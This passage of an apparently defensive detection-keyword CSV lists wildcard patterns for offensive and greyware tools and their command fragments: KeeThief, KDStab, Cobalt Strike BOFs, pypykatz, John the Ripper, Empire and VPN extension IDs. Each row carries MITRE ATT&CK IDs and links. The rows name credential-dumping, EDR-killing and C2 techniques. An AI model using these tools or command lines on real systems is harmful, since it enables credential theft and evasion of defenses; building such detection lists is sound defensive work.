Kali Linux which use iptables settings to create a Transparent Proxy through the Tor Network. the program also allows you to perform various checks like checking the Tor Exit Node (i.e. your public IP when you are under Tor proxy). or if Tor has been configured correctly checking service and network settings.","T1090 - T1132 - T1046 - T1016","TA0003 - TA0011 - TA0040","N/A","N/A","Data Exfiltration","https://github.com/brainfucksec/kalitorify","1","0","N/A","N/A","9","898","214","2022-05-31T08:47:52Z","2016-02-03T20:42:46Z" +"*kaluche/bloodhound-quickwin*","offensive_tool_keyword","bloodhound-quickwin","Simple script to extract useful informations from the combo BloodHound + Neo4j","T1087 - T1087.001 - T1018 - T1069 - T1069.002","TA0007 - TA0003 - TA0004","N/A","N/A","AD Enumeration","https://github.com/kaluche/bloodhound-quickwin","1","1","N/A","6","2","162","17","2023-07-17T14:31:51Z","2021-02-16T16:04:16Z" +"*kancotdiq/wpaf*","offensive_tool_keyword","wpaf","WordPress admin finder","T1596","TA0007","N/A","N/A","Web Attacks","https://github.com/kancotdiq/wpaf","1","0","N/A","N/A","1","51","8","2018-07-12T04:55:58Z","2018-07-11T18:09:11Z" +"*karendm/ADHunt*","offensive_tool_keyword","adhunt","Tool for exploiting Active Directory Enviroments - enumeration","T1018 - T1087 - T1087.002 - T1069 - T1069.002","TA0007 - TA0003 - TA0001","N/A","N/A","AD Enumeration","https://github.com/karendm/ADHunt","1","1","N/A","7","1","41","8","2023-08-10T18:55:39Z","2023-06-20T13:24:10Z" +"*Karmaleon.py*","offensive_tool_keyword","inceptor","Template-Driven AV/EDR Evasion Framework","T1562.001 - T1059.003 - T1027.002 - T1070.004","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/klezVirus/inceptor","1","1","N/A","N/A","10","1357","243","2023-07-25T15:28:56Z","2021-08-02T15:35:57Z" +"*karmaSMB.py*","offensive_tool_keyword","impacket","Impacket is a collection of Python classes for working with network protocols. Impacket is focused on providing low-level programmatic access to the packets and for some protocols (e.g. SMB1-3 and MSRPC) the protocol implementation itself","T1557.001 - T1040 - T1003.001 - T1003.002 - T1003.003 - T1003.004 - T1558.003 - T1569.002 - T1047","TA0001 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008 - TA0011","Operation Wocao","HAFNIUM - Threat Group-3390 - Dragonfly - FIN8 - Sandworm Team - menuPass - Magic Hound","Lateral movement","https://github.com/fortra/impacket","1","1","N/A","10","10","11788","3290","2023-10-03T20:36:46Z","2015-04-15T14:04:07Z" +"*katoolin*toollist.py*","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","1","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" +"*katoolin3.py*","offensive_tool_keyword","katoolin3","Katoolin3 brings all programs available in Kali Linux to Debian and Ubuntu.","T1203 - T1090 - T1020","TA0006 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/s-h-3-l-l/katoolin3","1","1","N/A","N/A","4","315","103","2020-08-05T17:21:00Z","2019-09-05T13:14:46Z" +"*KatzSystemArchitecture*","offensive_tool_keyword","pypykatz","Mimikatz implementation in pure Python","T1003.002 - T1055 - T1078","TA0003 - TA0002 - TA0004","N/A","N/A","Credential Access","https://github.com/skelsec/pypykatz","1","0","N/A","N/A","10","2471","369","2023-05-30T16:14:22Z","2018-05-25T22:21:20Z" +"*KBDPAYLOAD.dll*","offensive_tool_keyword","cobaltstrike","Achieve execution using a custom keyboard layout","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/NtQuerySystemInformation/CustomKeyboardLayoutPersistence","1","1","N/A","10","10","156","30","2023-05-23T20:34:26Z","2022-03-13T17:43:29Z" +"*kcdahmgmaagjhocpipbodaokikjkampi*","greyware_tool_keyword","Hola VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*kchocjcihdgkoplngjemhpplmmloanja*","greyware_tool_keyword","IPBurger Proxy & VPN","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*kcndmbbelllkmioekdagahekgimemejo*","greyware_tool_keyword","VPN.AC","External VPN usage within coporate network","T1090.003 - T1133 - T1572","TA0003 - TA0001 - TA0011 - TA0010 - TA0005","N/A","N/A","Data Exfiltration","https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml","1","0","detection in registry","8","10","N/A","N/A","N/A","N/A" +"*KcpPassword.cs*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" +"*kdcdump2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*kdstab * /CHECK*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*kdstab * /CLOSE*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*kdstab * /DRIVER*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*kdstab * /KILL*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*kdstab * /LIST*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*kdstab * /NAME*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*kdstab * /PID*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*kdstab * /SERVICE*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*kdstab * /STRIP*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*kdstab * /UNLOAD*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","0","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*kdstab.cna*","offensive_tool_keyword","cobaltstrike","BOF combination of KillDefender and Backstab","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Octoberfest7/KDStab","1","1","N/A","10","10","146","35","2023-03-23T02:22:50Z","2022-03-10T06:09:52Z" +"*KeeFarceReborn.*","offensive_tool_keyword","Dinjector","Collection of shellcode injection techniques packed in a D/Invoke weaponized DLL","T1055 - T1055.012 - T1055.001 - T1027.002","TA0005 - TA0002","N/A","N/A","Exploitation tools","https://github.com/Metro-Holografix/DInjector","1","1","private github repo","10",,"N/A",,, +"*KeePass.sln*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" +"*keepass_common_plug.*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*keepass_discover.py*","offensive_tool_keyword","crackmapexec","A swiss army knife for pentesting networks","T1210 T1570 T1021 T1595 T1592 T1589 T1590 ","N/A","N/A","N/A","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","7683","1597","2023-09-09T14:19:36Z","2015-08-14T14:11:55Z" +"*keepass2john *.kdbx*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","0","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z" +"*KeePassBackdoor.*","offensive_tool_keyword","SharPersist","SharPersist Windows persistence toolkit written in C#.","T1547 - T1053 - T1027 - T1028 - T1112","TA0003 - TA0008","N/A","N/A","Persistence","https://github.com/fireeye/SharPersist","1","0","N/A","10","10","1151","233","2023-08-11T00:52:09Z","2019-06-21T13:32:14Z" +"*KeePassConfig.ps1*","offensive_tool_keyword","empire","Empire scripts paths. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1071","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*KeePassConfig.ps1*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" +"*-KeePassConfigTrigger*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*keepass-password-dumper*","offensive_tool_keyword","keepass-password-dumper","KeePass Master Password Dumper is a simple proof-of-concept tool used to dump the master password from KeePass's memory. Apart from the first password character it is mostly able to recover the password in plaintext. No code execution on the target system is required. just a memory dump","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/vdohney/keepass-password-dumper","1","1","N/A","N/A","6","567","47","2023-08-17T19:26:55Z","2023-05-01T17:08:55Z" +"*KeePwn plugin add -u * -p * -d * -t *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*KeePwn plugin check -u *","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tool","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1251","151","2023-09-30T20:47:39Z","2020-03-09T19:12:11Z" +"*KeeTheft/Dinvoke*","offensive_tool_keyword","KeeThiefSyscalls","Patch GhostPack/KeeThief for it to use DInvoke and syscalls","T1003.001 - T1558.002","TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/Metro-Holografix/KeeThiefSyscalls","1","1","private github repo","10",,"N/A",,, +"*KeeThief*","offensive_tool_keyword","Keethief","Allows for the extraction of KeePass 2.X key material from memory as well as the backdooring and enumeration of the KeePass trigger system.","T1003 - T1213 - T1215 - T1566","TA0005 - TA0007 - TA0008","N/A","N/A","Credential Access","https://github.com/GhostPack/KeeThief","1","1","N/A","N/A","9","863","151","2020-11-18T18:35:21Z","2016-07-10T19:11:23Z" +"*KeeThief.*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and 